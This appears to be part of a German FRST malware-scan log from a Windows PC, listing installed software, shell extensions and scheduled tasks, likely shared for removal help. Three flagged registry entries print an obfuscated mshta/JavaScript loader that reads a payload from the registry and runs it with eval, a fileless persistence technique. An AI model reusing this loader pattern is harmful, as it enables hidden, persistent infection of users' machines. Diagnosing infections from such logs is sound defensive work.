Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft
Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation) Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang) Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC) Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version: - Rogue Factor) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 
4.20.9818.0 - Microsoft Corporation) MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger) No Man's Sky (HKLM\...\Steam App 275850) (Version: - Hello Games) NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation) NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation) NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation) NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation) NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation) Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.) Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.) 
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros) Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros) Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version: - Ubisoft) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version: - Crystal Dynamics) Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts) Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation) Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.) 
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.) Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz) Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios) Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB) Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games) STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts) StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic) The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios) The Long Dark (HKLM\...\Steam App 305620) (Version: - Hinterland Studio Inc.) 
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com) The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com) The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com) The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com) Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version: - Massive Entertainment) TomTom MyDrive Connect 4.1.5.3181 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.5.3181 - TomTom) Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version: - Creative Assembly) Tyranny (HKLM\...\Steam App 362960) (Version: - Obsidian Entertainment) Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft) VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.) VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com) Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.) 
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes) Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment) Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version: - Fatshark) WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: - ) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version: - MachineGames) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) 
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) 
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\5b53a: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\qofqow: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => -> Keine Datei
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Keine Datei
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff" Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.) Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) 
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation) Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd) Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation) Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-07-11] (Microsoft Corporation) Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation) Task: {577763E4-17E6-4D07-A67F-13108AB9872D} - System32\Tasks\Uninstaller_Install_Martin_Walser => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) 
Task: {6277B01E-8C65-4DE6-9712-35ABEBF90E78} - System32\Tasks\StartMenu8_Start => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe [2016-11-05] () Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation) Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation) Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation) Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.) 
